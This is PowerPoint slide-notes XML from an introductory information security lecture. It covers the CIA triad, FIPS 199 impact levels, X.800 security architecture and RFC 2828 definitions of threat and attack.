                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) cause a degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is noticeably reduced; (ii) result in minor damage to organizational assets; (iii) result in minor financial loss; or (iv) result in minor harm to individuals.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Moderate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The loss could be expected to have a serious adverse effect on organizational operations, organizational assets, or individuals. A serious adverse effect means that, for example, the loss might (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) cause a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; (ii) result in significant damage to organizational assets; (iii) result in significant financial loss; or (iv) result in significant harm to individuals that does not involve loss of life or serious, life-threatening injuries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>High: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The loss could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, or individuals. A severe or catastrophic adverse effect means that, for example, the loss might (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) cause a severe degradation in or loss of mission capability to an extent and duration that the organization is not able to perform one or more of its primary functions; (ii) result in major damage to organizational assets; (iii) result in major financial loss; or (iv) result in severe or catastrophic harm to individuals involving loss of life or serious life threatening injuries.</a:t>
            </a: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E9DC8-ED02-464C-9358-EC594BCEC4D6}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3342851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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We now provide some examples of applications that illustrate the requirements just enumerated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• Confidentiality - Student grade information is an asset whose confidentiality is considered to be highly important by students. Grade information should only be available to students, their parents, and employees that require the information to do their job. Student enrollment information may have a moderate confidentiality rating. While still coveredby FERPA, this information is seen by more people on a daily basis, is less likely to be targeted than grade information, and results in less damage if disclosed. Directory information, such as lists of students or faculty or departmental lists, may be assigned a low confidentiality rating or indeed no rating. This information is typically freely available to the public and published on a school's Web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• Integrity – Consider a hospital patient's allergy information stored in a database. The doctor should be able to trust that the information is correct and current. Now suppose that an employee (e.g., a nurse) who is authorized to view and update this information deliberately falsifies the data to cause harm to the hospital. The database needs to be restored to a trusted basis quickly, and it should be possible to trace the error back to the person responsible. Patient allergy information is an example of an asset with a high requirement for integrity. Inaccurate information could result in serious harm or death to a patient and expose the hospital to massive liability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• Availability - The more critical a component or service, the higher is the level of availability required. Consider a system that provides authentication services for critical systems, applications, and devices. An interruption of service results in the inability for customers to access computing resources and staff to access the resources they need to perform critical tasks. The loss of the service translates into a large financial loss in lost employee productivity and potential customer loss.</a:t>
            </a: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104B6BB-A5FB-49DA-8407-43B19FA3D3A4}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1834544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E583645-1D3E-4467-98D0-A2150866849A}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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To assess effectively the security needs of an organization and to evaluate and choose various security products and policies, the manager responsible for security needs some systematic way of defining the requirements for security and characterizing the approaches to satisfying those requirements. This is difficult enough in a centralized data processing environment; with the use of local and wide area networks the problems are compounded. ITU-T Recommendation X.800, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Architecture for OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, defines such a systematic approach. The OSI security architecture is useful to managers as a way of organizing the task of providing security.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1975606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24CA93D-FB35-432B-BB24-1218F803C3EB}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>State here a couple of definitions of “security services” from relevant standards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>X.800 defines a security service as a service provided by a protocol layer of communicating open systems, which ensures adequate security of the systems or of data transfers. Perhaps a clearer definition is found in RFC 2828, which provides the following definition: a processing or communication service that is provided by a system to give a specific kind of protection to system resources; security services implement security policies and are implemented by security mechanisms. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" i="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="it-IT" i="1">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7797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CD57BEF-4120-43C8-BE6B-9B6078D5101E}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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This general model shows that there are four basic tasks in designing a particular security service, as listed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2435386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2B8270D-8950-4A4D-A056-95D8B517278A}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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Detail here the tasks needed to use this model.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2138514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E85D1CA-281E-403A-82C2-D81055F71BE6}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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Chapter 1 summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387275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gnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563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5632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9597495-FF50-45FC-8F0E-DEBE73C726EF}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35595644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egnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2150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150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924D630-3354-4418-8529-3FDC93914453}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375698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egnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1945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946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90DBA2C-3EDE-4BF3-AB76-E6D56C87A630}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173293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egnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2355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355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276726-8C92-4839-AFA0-42842B38CF4C}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115878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176388-96C4-44E7-A622-3E258D05A233}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The OSI security architecture focuses on security attacks, mechanisms, and services. These can be defined briefly as follows:</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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Any action that compromises the security of information owned by an organization.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mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: A process (or a device incorporating such a process) that is designed to detect, prevent, or recover from a security attack.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service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In the literature, the terms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>threat and attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>are commonly used to mean more or less the same thing. Table 1.1 provides definitions taken from RFC 2828, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internet Security Glossary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Threat - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A potential for violation of security, which exists when there is a circumstance, capability, action, or event that could breach security and cause harm. That is, a threat is a possible danger that might exploit a vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An assault on system security that derives from an intelligent threat; that is, an intelligent act that is a deliberate attempt (especially in the sense of a method or technique) to evade security services and violate the security policy of a system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3541281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immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2765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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>INSERIRE ESEMPIO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2765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1F8A70E-45EB-4646-A845-D70FC79B4188}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118338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Cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3035</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" baseline="0" dirty="0"/>
              <a:t> http://www.securityfocus.com/archive/1/archive/1/535240/100/0/threaded</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto numero diapositiva 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C20A34D6-EB4B-4C52-946F-3D46AC9FE52F}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2347711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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>These three concepts form what is often referred to as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CIA triad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Figure 1.1). The three concepts embody the fundamental security objectives for both data and for information and computing services. FIPS PUB 199 provides a useful characterization of these three objectives in terms of requirements and the definition of a loss of security in each category:</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Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (covers both data confidentiality and privacy): preserving authorized restrictions on information access and disclosure, including means for protecting personal privacy and proprietary information. A loss of confidentiality is the unauthorized disclosure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Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (covers both data and system integrity)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity. A loss of integrity is the unauthorized modification or destruction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Availability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Ensuring timely and reliable access to and use of information. A loss of availability is the disruption of access to or use of information or an information system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Although the use of the CIA triad to define security objectives is well established, some in the security field feel that additional concepts are needed to present a complete picture. Two of the most commonly mentioned are:</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Authenticity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The property of being genuine and being able to be verified and trusted; confidence in the validity of a transmission, a message, or message originator.</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Accountability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The security goal that generates the requirement for actions of an entity to be traced uniquely to that entity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="it-IT" dirty="0">
